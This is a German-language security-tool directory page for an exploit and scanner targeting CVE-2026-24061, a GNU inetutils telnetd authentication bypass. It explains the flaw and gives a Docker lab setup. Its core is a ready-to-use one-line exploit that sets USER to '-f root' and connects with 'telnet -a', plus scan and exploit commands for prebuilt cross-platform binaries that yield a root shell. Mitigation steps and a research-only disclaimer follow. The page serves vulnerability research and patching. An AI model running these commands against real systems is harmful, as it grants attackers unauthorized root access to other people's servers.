Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24061 — Exploit und Scanner für CVE-2026-24061, eine telnetd-Authentifizierungsumgehung, die über eine manipulierte USER-Umgebungsvariable eine Root-Shell gewährt. Enthält Docker-Umgebungseinrichtung und plattformübergreifende Exploit-Binaries. | Kitploit
Tools/GitHubGitHub/parad0x7e/cve-2026-24061
SchwachstellenanalyseExploitationNetzwerksicherheitPenetrationstestsAuthentifizierungRemote-Access-Tool
GitHubparad0x7e/cve-2026-24061

CVE-2026-24061

Exploit und Scanner für CVE-2026-24061, eine telnetd-Authentifizierungsumgehung, die über eine manipulierte USER-Umgebungsvariable eine Root-Shell gewährt. Enthält Docker-Umgebungseinrichtung und plattformübergreifende Exploit-Binaries.

Repository anzeigen
8vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-24061: telnetd-Authentifizierungs-Bypass-Schwachstelle

CVE-2026-24061 ist eine Authentifizierungs-Bypass-Schwachstelle in telnetd, die es Angreifern ermöglicht, die Identitätsprüfung durch bestimmte Kombinationen von Umgebungsvariablen zu umgehen und direkt eine Shell mit Root-Rechten zu erhalten.

Es gibt einen Fehler in der Authentifizierungslogik von telnetd. Bei Verwendung der Option -a (automatische Anmeldung) in Kombination mit einer bestimmten USER-Umgebungsvariable (wie -f root) ist es möglich, den normalen Authentifizierungsprozess zu umgehen und sich direkt als Root-Benutzer anzumelden.

Einführung

GNU InetUtils ist eine Sammlung grundlegender Netzwerktools im Rahmen des GNU-Projekts. Es enthält viele traditionelle Netzwerk-Clients und -Daemons wie ftp, telnet, rsh, rlogin, usw. und bietet eine umfassende, GNU-stilistische Netzwerkkomponentenbibliothek. ist das Serverprogramm in diesem Toolkit, das für die Verarbeitung eingehender Telnet-Verbindungsanfragen zuständig ist. Seine Hauptaufgabe besteht darin, Remote-Benutzern eine interaktive Terminalschnittstelle (normalerweise eine Shell) bereitzustellen.

tftp
telnetd

Funktionsweise

  1. Wird normalerweise von inetd oder xinetd auf Port 23 überwacht. Wenn eine Anfrage eintrifft, wird telnetd gestartet.
  2. Verarbeitet die protokollspezifische Optionsaushandlung von Telnet (wie Terminaltyp, Fenstergröße, Zeichensatz usw.).
  3. Ruft normalerweise das zugrunde liegende login-Programm des Systems auf, um Benutzername und Passwort zu verifizieren.
  4. Nach erfolgreicher Anmeldung wird dem Benutzer ein Pseudo-Terminal zugewiesen und die angegebene Shell gestartet.

Referenzen

  • https://github.com/yanxinwu946/CVE-2026-24061--telnetd
  • https://github.com/vulhub/vulhub/
  • https://forum.butian.net/share/4766

Umgebungseinrichtung

Laden Sie zunächst dieses Repository lokal herunter. Die Verzeichnisstruktur ist wie folgt:

Führen Sie in diesem Verzeichnis den folgenden Befehl aus, um die verwundbare Umgebung für CVE-2026-24061 zu starten:

root@kitploit:~
docker compose up -d --build

Nach dem Start läuft der Telnet-Dienst auf 0.0.0.0:2323

Schwachstellenprinzip

  1. Die Option -a von telnetd dient zur Aktivierung der automatischen Anmeldefunktion
  2. Wenn -a aktiviert ist, liest telnetd die USER-Umgebungsvariable als Anmeldebenutzernamen
  3. Wenn die USER-Umgebungsvariable auf -f root gesetzt ist, interpretiert telnetd -f fälschlicherweise als Optionsflag und root als Zielbenutzer
  4. Dadurch wird die Authentifizierungsprüfung umgangen und eine Sitzung direkt als Root-Benutzer aufgebaut

Ausnutzung der Schwachstelle

Manuelle Ausnutzung

root@kitploit:~
# Setzen Sie die USER-Umgebungsvariable und verbinden Sie sich mit telnet -a
env USER='-f root' telnet -a 127.0.0.1 2323

Bei Erfolg erhalten Sie eine interaktive Shell mit Root-Rechten:

Tool-basierte Ausnutzung

root@kitploit:~
cd exp

Sie sehen drei Dateien: exp, exp_darwin und exp.exe sind ausführbare Dateien für Linux, Mac bzw. Windows. Wählen Sie die benötigte aus. Der Quellcode des Tools wird ebenfalls bereitgestellt. Wenn Sie andere Versionen benötigen, können Sie diese selbst kompilieren. Hier verwende ich exp für Linux, das ausführliche Hilfsinformationen enthält.

Erkennen, ob die Schwachstelle vorhanden ist (standardmäßig wird Port 23 gescannt):

root@kitploit:~
./exp -mode scan -target your-ip -port your-port

Die Schwachstelle ausnutzen und eine Shell erhalten:

root@kitploit:~
./exp -mode exploit -target your-ip -port your-port

So beheben Sie das Problem

  1. Aktualisieren Sie inetutils-telnetd auf die neueste Version
  2. Deaktivieren Sie den Telnet-Dienst in der Produktionsumgebung und verwenden Sie stattdessen SSH
  3. Stellen Sie den Telnet-Dienst in einer isolierten internen Netzwerkumgebung bereit
  4. Verwenden Sie eine Firewall, um die Zugriffsquelle des Telnet-Dienstes einzuschränken

Haftungsausschluss

Dieses Projekt dient ausschließlich der Sicherheitsforschung und zu Bildungszwecken. Verwenden Sie es nicht auf nicht autorisierten Systemen. Benutzer übernehmen die volle rechtliche Verantwortung für alle Konsequenzen, die sich aus der Nutzung dieses Tools ergeben.

Tool herunterladen